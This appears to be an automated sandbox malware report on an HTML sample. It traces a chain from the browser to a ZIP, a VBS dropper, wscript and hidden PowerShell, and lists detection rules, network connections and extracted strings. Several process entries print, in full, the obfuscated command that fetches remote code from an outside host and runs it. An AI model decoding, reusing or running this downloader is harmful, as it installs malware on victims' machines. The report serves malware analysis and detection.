
Windows Analysis Report
CfF7MWq7aG.html

Overview

General Information

Sample name: CfF7MWq7aG.html
(renamed file extension from none to html, renamed because original name is a hash value)
Original sample name: 9182073a7541a8d2db5f94d7a980d70a9ce499c9ec55395fa968ecc65c828dfc
Analysis ID: 1607145
MD5: b235a6019e401173f74c6b6487bc5c50
SHA1: 0050ea0f086beffecaee1eba84d7e8f6d907d93e
SHA256: 9182073a7541a8d2db5f94d7a980d70a9ce499c9ec55395fa968ecc65c828dfc

Detection

Score: 92
Range: 0 - 100
Confidence: 100%

Signatures

System process connects to network (likely due to code injection or exploit)
Detected javascript redirector / loader
Downloads suspicious files via Chrome
Found suspicious ZIP file
Obfuscated command line found
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Potential Dosfuscation Activity
Sigma detected: Script Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Classification legend (graphic not reproduced): Ransomware, Spreading, Phishing, Banker, Trojan / Bot, Adware, Spyware, Exploiter, Evader, Miner; verdict scale: clean, suspicious, malicious
  • System is w10x64
  • chrome.exe (PID: 4940 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\CfF7MWq7aG.html" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 4544 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=1836,i,5843688646892688928,17905010364784798591,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • unarchiver.exe (PID: 6716 cmdline: "C:\Windows\SysWOW64\unarchiver.exe" "C:\Users\user\Downloads\CfF7MWq7aG.zip" MD5: 16FF3CC6CC330A08EED70CBC1D35F5D2)
      • 7za.exe (PID: 6744 cmdline: "C:\Windows\System32\7za.exe" x -pinfected -y -o"C:\Users\user\AppData\Local\Temp\4sayhkzp.t1p" "C:\Users\user\Downloads\CfF7MWq7aG.zip" MD5: 77E556CDFDC5C592F5C46DB4127C6F4C)
        • conhost.exe (PID: 6752 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 6812 cmdline: "cmd.exe" /C "C:\Users\user\AppData\Local\Temp\4sayhkzp.t1p\2025010453906.vbs" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 6820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • wscript.exe (PID: 6884 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\4sayhkzp.t1p\2025010453906.vbs" MD5: FF00E0480075B095948000BDC66E81F0)
          • cmd.exe (PID: 7036 cmdline: "C:\Windows\System32\cmd.exe" /C "echo $($KSJQTmC = $('{5}{4}{1}' -f $('uxhxeilT'.ToCharArray())); $((182,156,202,232,92,166,202,228,236,210,198,202,160,222,210,220,232,154,194,220,194,206,202,228,186,116,116,166,202,228,236,202,228,134,202,228,232,210,204,210,198,194,232,202,172,194,216,210,200,194,232,210,222,220,134,194,216,216,196,194,198,214,64,122,64,246,72,232,228,234,202,250,118,64,72,240,172,140,208,180,64,122,64,182,166,242,230,232,202,218,92,156,202,232,92,144,232,232,224,174,202,196,164,202,226,234,202,230,232,186,116,116,134,228,202,194,232,202,80,78,208,232,232,224,230,116,94,94,208,222,230,232,112,106,106,96,96,92,210,220,204,222,116,98,106,102,100,100,94,238,202,196,98,92,224,208,224,78,82,118,64,72,240,172,140,208,180,92,168,210,218,202,222,234,232,64,122,64,102,96,96,96,96,96,118,64,72,80,182,166,242,230,232,202,218,92,146,222,92,166,232,228,202,194,218,164,202,194,200,202,228,186,80,72,240,172,140,208,180,92,142,202,232,164,202,230,224,222,220,230,202,80,82,92,142,202,232,164,202,230,224,222,220,230,202,166,232,228,202,194,218,80,82,82,82,92,164,202,194,200,168,222,138,220,200,80,82,64,248,64,146,138,176)^^^|%{[char]($_/2)})-join'') ^^^| ^^^&($KSJQTmC) | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 7044 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • cmd.exe (PID: 7088 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo $($KSJQTmC = $('{5}{4}{1}' -f $('uxhxeilT'.ToCharArray())); $((182,156,202,232,92,166,202,228,236,210,198,202,160,222,210,220,232,154,194,220,194,206,202,228,186,116,116,166,202,228,236,202,228,134,202,228,232,210,204,210,198,194,232,202,172,194,216,210,200,194,232,210,222,220,134,194,216,216,196,194,198,214,64,122,64,246,72,232,228,234,202,250,118,64,72,240,172,140,208,180,64,122,64,182,166,242,230,232,202,218,92,156,202,232,92,144,232,232,224,174,202,196,164,202,226,234,202,230,232,186,116,116,134,228,202,194,232,202,80,78,208,232,232,224,230,116,94,94,208,222,230,232,112,106,106,96,96,92,210,220,204,222,116,98,106,102,100,100,94,238,202,196,98,92,224,208,224,78,82,118,64,72,240,172,140,208,180,92,168,210,218,202,222,234,232,64,122,64,102,96,96,96,96,96,118,64,72,80,182,166,242,230,232,202,218,92,146,222,92,166,232,228,202,194,218,164,202,194,200,202,228,186,80,72,240,172,140,208,180,92,142,202,232,164,202,230,224,222,220,230,202,80,82,92,142,202,232,164,202,230,224,222,220,230,202,166,232,228,202,194,218,80,82,82,82,92,164,202,194,200,168,222,138,220,200,80,82,64,248,64,146,138,176)^|%{[char]($_/2)})-join'') ^| ^&($KSJQTmC) " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • powershell.exe (PID: 7104 cmdline: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c - MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cleanup
No configs have been found
No yara matches

System Summary

Source: Network Connection | Author: frack113, Florian Roth | Data: DestinationIp: 54.39.156.32, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\wscript.exe, Initiated: true, ProcessId: 6884, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49748
Source: Process started | Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\4sayhkzp.t1p\2025010453906.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\4sayhkzp.t1p\2025010453906.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "cmd.exe" /C "C:\Users\user\AppData\Local\Temp\4sayhkzp.t1p\2025010453906.vbs", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6812, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\4sayhkzp.t1p\2025010453906.vbs" , ProcessId: 6884, ProcessName: wscript.exe
Source: Process started | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\4sayhkzp.t1p\2025010453906.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\4sayhkzp.t1p\2025010453906.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "cmd.exe" /C "C:\Users\user\AppData\Local\Temp\4sayhkzp.t1p\2025010453906.vbs", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6812, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\4sayhkzp.t1p\2025010453906.vbs" , ProcessId: 6884, ProcessName: wscript.exe
Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\4sayhkzp.t1p\2025010453906.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\4sayhkzp.t1p\2025010453906.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "cmd.exe" /C "C:\Users\user\AppData\Local\Temp\4sayhkzp.t1p\2025010453906.vbs", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6812, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\4sayhkzp.t1p\2025010453906.vbs" , ProcessId: 6884, ProcessName: wscript.exe
Source: Process startedAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /C "echo $($KSJQTmC = $('{5}{4}{1}' -f $('uxhxeilT'.ToCharArray())); $((182,156,202,232,92,166,202,228,236,210,198,202,160,222,210,220,232,154,194,220,194,206,202,228,186,116,116,166,202,228,236,202,228,134,202,228,232,210,204,210,198,194,232,202,172,194,216,210,200,194,232,210,222,220,134,194,216,216,196,194,198,214,64,122,64,246,72,232,228,234,202,250,118,64,72,240,172,140,208,180,64,122,64,182,166,242,230,232,202,218,92,156,202,232,92,144,232,232,224,174,202,196,164,202,226,234,202,230,232,186,116,116,134,228,202,194,232,202,80,78,208,232,232,224,230,116,94,94,208,222,230,232,112,106,106,96,96,92,210,220,204,222,116,98,106,102,100,100,94,238,202,196,98,92,224,208,224,78,82,118,64,72,240,172,140,208,180,92,168,210,218,202,222,234,232,64,122,64,102,96,96,96,96,96,118,64,72,80,182,166,242,230,232,202,218,92,146,222,92,166,232,228,202,194,218,164,202,194,200,202,228,186,80,72,240,172,140,208,180,92,142,202,232,164,202,230,224,222,220,230,202,80,82,92,142,202,232,164,202,230,224,222,220,230,202,166,232,228,202,194,218,80,82,82,82,92,164,202,194,200,168,222,138,220,200,80,82,64,248,64,146,138,176)^^^|%{[char]($_/2)})-join'') ^^^| ^^^&($KSJQTmC) | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -", CommandLine: "C:\Windows\System32\cmd.exe" /C "echo $($KSJQTmC = $('{5}{4}{1}' -f $('uxhxeilT'.ToCharArray())); 
$((182,156,202,232,92,166,202,228,236,210,198,202,160,222,210,220,232,154,194,220,194,206,202,228,186,116,116,166,202,228,236,202,228,134,202,228,232,210,204,210,198,194,232,202,172,194,216,210,200,194,232,210,222,220,134,194,216,216,196,194,198,214,64,122,64,246,72,232,228,234,202,250,118,64,72,240,172,140,208,180,64,122,64,182,166,242,230,232,202,218,92,156,202,232,92,144,232,232,224,174,202,196,164,202,226,234,202,230,232,186,116,116,134,228,202,194,232,202,80,78,208,232,232,224,230,116,94,94,208,222,230,232,112,106,106,96,96,92,210,220,204,222,116,98,106,102,100,100,94,238,202,196,98,92,224,208,224,78,82,118,64,72,240,172,140,208,180,92,168,210,218,202,222,234,232,64,122,64,102,96,96,96,96,96,118,64,72,80,182,166,242,230,232,202,218,92,146,222,92,166,232,228,202,194,218,164,202,194,200,202,228,186,80,72,240,172,140,208,180,92,142,202,232,164,202,230,224,222,220,230,202,80,82,92,142,202,232,164,202,230,224,222,220,230,202,166,232,228,202,194,218,80,82,82,82,92,164,202,194,200,168,222,138,220,200,80,82,64,248,64,146,138,176)^^^|%{[char]($_/2)})-join'') ^^^| ^^^&($KSJQTmC) | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\4sayhkzp.t1p\2025010453906.vbs" , ParentImage: C:\Windows\SysWOW64\wscript.exe, ParentProcessId: 6884, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System3
Source: Network Connection | Author: frack113 | Data: DestinationIp: 54.39.156.32, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\wscript.exe, Initiated: true, ProcessId: 6884, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49748
Source: Process started | Author: Michael Haag | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\4sayhkzp.t1p\2025010453906.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\4sayhkzp.t1p\2025010453906.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "cmd.exe" /C "C:\Users\user\AppData\Local\Temp\4sayhkzp.t1p\2025010453906.vbs", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6812, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\4sayhkzp.t1p\2025010453906.vbs" , ProcessId: 6884, ProcessName: wscript.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -, CommandLine: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -, CommandLine|base64offset|contains: hv, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /C "echo $($KSJQTmC = $('{5}{4}{1}' -f $('uxhxeilT'.ToCharArray())); $((182,156,202,232,92,166,202,228,236,210,198,202,160,222,210,220,232,154,194,220,194,206,202,228,186,116,116,166,202,228,236,202,228,134,202,228,232,210,204,210,198,194,232,202,172,194,216,210,200,194,232,210,222,220,134,194,216,216,196,194,198,214,64,122,64,246,72,232,228,234,202,250,118,64,72,240,172,140,208,180,64,122,64,182,166,242,230,232,202,218,92,156,202,232,92,144,232,232,224,174,202,196,164,202,226,234,202,230,232,186,116,116,134,228,202,194,232,202,80,78,208,232,232,224,230,116,94,94,208,222,230,232,112,106,106,96,96,92,210,220,204,222,116,98,106,102,100,100,94,238,202,196,98,92,224,208,224,78,82,118,64,72,240,172,140,208,180,92,168,210,218,202,222,234,232,64,122,64,102,96,96,96,96,96,118,64,72,80,182,166,242,230,232,202,218,92,146,222,92,166,232,228,202,194,218,164,202,194,200,202,228,186,80,72,240,172,140,208,180,92,142,202,232,164,202,230,224,222,220,230,202,80,82,92,142,202,232,164,202,230,224,222,220,230,202,166,232,228,202,194,218,80,82,82,82,92,164,202,194,200,168,222,138,220,200,80,82,64,248,64,146,138,176)^^^|%{[char]($_/2)})-join'') ^^^| ^^^&($KSJQTmC) | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7036, ParentProcessName: cmd.exe, ProcessCommandLine: 
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -, ProcessId: 7104, ProcessName: powershell.exe
No Suricata rule has matched

Phishing

Source: CfF7MWq7aG.html | HTTP Parser: Low number of body elements: 0
Source: CfF7MWq7aG.html | HTTP Parser: No favicon
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4940_1443407132\LICENSE.txt
Source: C:\Windows\SysWOW64\unarchiver.exe | File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dll
Source: unknown | HTTPS traffic detected: 54.39.156.32:443 -> 192.168.2.4:49748 version: TLS 1.2
Source: Binary string: Google.Widevine.CDM.dll.pdb source: Google.Widevine.CDM.dll.0.dr

Software Vulnerabilities

Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Child: C:\Windows\SysWOW64\wscript.exe
Source: C:\Windows\SysWOW64\wscript.exe | Child: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Networking

Source: C:\Windows\SysWOW64\wscript.exe | Network Connect: 54.39.156.32 443
Source: global traffic | TCP traffic: 192.168.2.4:49740 -> 45.93.9.167:15322
Source: global traffic | TCP traffic: 192.168.2.4:56878 -> 1.1.1.1:53
Source: Joe Sandbox View | IP Address: 54.39.156.32
Source: Joe Sandbox View | IP Address: 142.4.219.198
Source: Joe Sandbox View | IP Address: 239.255.255.250
Source: Joe Sandbox View | ASN Name: OVHFR
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown | TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown | TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | TCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknown | TCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | HTTP traffic detected:
    GET /stats/0.php?4926117&@f16&@g1&@h1&@i1&@vhttps://histats.com/s_opened_TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzExNy4wLjAuMCBTYWZhcmkvNTM3LjM2 HTTP/1.1
    Host: s4.histats.com
    Connection: keep-alive
    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    sec-ch-ua-platform: "Windows"
    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
    Sec-Fetch-Site: cross-site
    Sec-Fetch-Mode: no-cors
    Sec-Fetch-Dest: image
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
Source: global traffic | HTTP traffic detected:
    GET /stats/0.php?4926117&@f16&@g1&@h1&@i1&@vhttps://histats.com/s_opened_TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzExNy4wLjAuMCBTYWZhcmkvNTM3LjM2 HTTP/1.1
    Host: s4.histats.com
    Connection: keep-alive
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    Accept: */*
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
Source: global traffic | HTTP traffic detected:
    GET /stats/0.php?4926118&@f16&@g1&@h1&@i1&@vhttps://histats.com/d_opened HTTP/1.1
    Accept: */*
    Accept-Language: en-ch
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: s4.histats.com
    Connection: Keep-Alive
Source: global traffic | DNS traffic detected: DNS query: s4.histats.com
Source: global traffic | DNS traffic detected: DNS query: host85500.info
Source: global traffic | DNS traffic detected: DNS query: _15322._https.host85500.info
Source: global traffic | DNS traffic detected: DNS query: www.google.com
Source: Google.Widevine.CDM.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: Google.Widevine.CDM.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: Google.Widevine.CDM.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: Google.Widevine.CDM.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: Google.Widevine.CDM.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: Google.Widevine.CDM.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: Google.Widevine.CDM.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: Google.Widevine.CDM.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: Google.Widevine.CDM.dll.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: Google.Widevine.CDM.dll.0.drString found in binary or memory: http://ocsp.digicert.com0
Source: Google.Widevine.CDM.dll.0.drString found in binary or memory: http://ocsp.digicert.com0A
Source: Google.Widevine.CDM.dll.0.drString found in binary or memory: http://ocsp.digicert.com0C
Source: Google.Widevine.CDM.dll.0.drString found in binary or memory: http://ocsp.digicert.com0X
Source: Google.Widevine.CDM.dll.0.drString found in binary or memory: http://www.digicert.com/CPS0
Source: sets.json.0.drString found in binary or memory: https://07c225f3.online
Source: optimization-hints.pb.0.drString found in binary or memory: https://123milhas.com/v2/busca/confirmacao-pedido/.
Source: sets.json.0.drString found in binary or memory: https://24.hu
Source: sets.json.0.drString found in binary or memory: https://aajtak.in
Source: sets.json.0.drString found in binary or memory: https://abczdrowie.pl
Source: sets.json.0.drString found in binary or memory: https://alice.tw
Source: sets.json.0.drString found in binary or memory: https://ambitionbox.com
Source: sets.json.0.drString found in binary or memory: https://autobild.de
Source: sets.json.0.drString found in binary or memory: https://baomoi.com
Source: sets.json.0.drString found in binary or memory: https://bild.de
Source: sets.json.0.drString found in binary or memory: https://blackrock.com
Source: sets.json.0.drString found in binary or memory: https://blackrockadvisorelite.it
Source: sets.json.0.drString found in binary or memory: https://bluradio.com
Source: sets.json.0.drString found in binary or memory: https://bolasport.com
Source: sets.json.0.drString found in binary or memory: https://bonvivir.com
Source: sets.json.0.drString found in binary or memory: https://bumbox.com
Source: sets.json.0.drString found in binary or memory: https://businessinsider.com.pl
Source: sets.json.0.drString found in binary or memory: https://businesstoday.in
Source: sets.json.0.drString found in binary or memory: https://cachematrix.com
Source: sets.json.0.drString found in binary or memory: https://cafemedia.com
Source: sets.json.0.drString found in binary or memory: https://caracoltv.com
Source: sets.json.0.drString found in binary or memory: https://carcostadvisor.be
Source: sets.json.0.drString found in binary or memory: https://carcostadvisor.com
Source: sets.json.0.drString found in binary or memory: https://carcostadvisor.fr
Source: sets.json.0.drString found in binary or memory: https://cardsayings.net
Source: sets.json.0.drString found in binary or memory: https://chatbot.com
Source: optimization-hints.pb.0.drString found in binary or memory: https://checkout-new.dafiti.com.br/success/index.html.
Source: optimization-hints.pb.0.drString found in binary or memory: https://checkout.casasbahia.com.br/compra-finalizada
Source: optimization-hints.pb.0.drString found in binary or memory: https://checkout.extra.com.br/compra-finalizada
Source: optimization-hints.pb.0.drString found in binary or memory: https://checkout.pontofrio.com.br/compra-finalizada
Source: sets.json.0.drString found in binary or memory: https://chennien.com
Source: sets.json.0.drString found in binary or memory: https://citybibleforum.org
Source: sets.json.0.drString found in binary or memory: https://clarosports.com
Source: sets.json.0.drString found in binary or memory: https://clmbtech.com
Source: sets.json.0.drString found in binary or memory: https://closeronline.co.uk
Source: sets.json.0.drString found in binary or memory: https://clubelpais.com.uy
Source: sets.json.0.drString found in binary or memory: https://cmxd.com.mx
Source: sets.json.0.drString found in binary or memory: https://cognitive-ai.ru
Source: sets.json.0.drString found in binary or memory: https://cognitiveai.ru
Source: sets.json.0.drString found in binary or memory: https://commentcamarche.com
Source: sets.json.0.drString found in binary or memory: https://commentcamarche.net
Source: optimization-hints.pb.0.drString found in binary or memory: https://comprasegura.olx.com.br/
Source: optimization-hints.pb.0.drString found in binary or memory: https://comprasegura.olx.com.br/pedidos/.
Source: sets.json.0.drString found in binary or memory: https://computerbild.de
Source: sets.json.0.drString found in binary or memory: https://content-loader.com
Source: sets.json.0.drString found in binary or memory: https://cookreactor.com
Source: LICENSE.txt.0.drString found in binary or memory: https://creativecommons.org/.
Source: LICENSE.txt.0.drString found in binary or memory: https://creativecommons.org/compatiblelicenses
Source: sets.json.0.drString found in binary or memory: https://cricbuzz.com
Source: sets.json.0.drString found in binary or memory: https://css-load.com
Source: sets.json.0.drString found in binary or memory: https://deccoria.pl
Source: sets.json.0.drString found in binary or memory: https://deere.com
Source: sets.json.0.drString found in binary or memory: https://desimartini.com
Source: sets.json.0.drString found in binary or memory: https://dewarmsteweek.be
Source: sets.json.0.drString found in binary or memory: https://drimer.io
Source: sets.json.0.drString found in binary or memory: https://drimer.travel
Source: optimization-hints.pb.0.drString found in binary or memory: https://dump-truck.appspot.com/.
Source: LICENSE.txt.0.drString found in binary or memory: https://easylist.to/)
Source: sets.json.0.drString found in binary or memory: https://economictimes.com
Source: sets.json.0.drString found in binary or memory: https://een.be
Source: sets.json.0.drString found in binary or memory: https://efront.com
Source: sets.json.0.drString found in binary or memory: https://eleconomista.net
Source: sets.json.0.drString found in binary or memory: https://elfinancierocr.com
Source: sets.json.0.drString found in binary or memory: https://elgrafico.com
Source: sets.json.0.drString found in binary or memory: https://ella.sv
Source: sets.json.0.drString found in binary or memory: https://elpais.com.uy
Source: sets.json.0.drString found in binary or memory: https://elpais.uy
Source: optimization-hints.pb.0.drString found in binary or memory: https://emv-qr.googleplex.com/.
Source: sets.json.0.drString found in binary or memory: https://etfacademy.it
Source: sets.json.0.drString found in binary or memory: https://eworkbookcloud.com
Source: sets.json.0.drString found in binary or memory: https://eworkbookrequest.com
Source: sets.json.0.drString found in binary or memory: https://fakt.pl
Source: sets.json.0.drString found in binary or memory: https://finn.no
Source: sets.json.0.drString found in binary or memory: https://firstlook.biz
Source: sets.json.0.drString found in binary or memory: https://gallito.com.uy
Source: sets.json.0.drString found in binary or memory: https://geforcenow.com
Source: sets.json.0.drString found in binary or memory: https://gettalkdesk.com
Source: LICENSE.txt.0.drString found in binary or memory: https://github.com/easylist)
Source: sets.json.0.drString found in binary or memory: https://gliadomain.com
Source: sets.json.0.drString found in binary or memory: https://gnttv.com
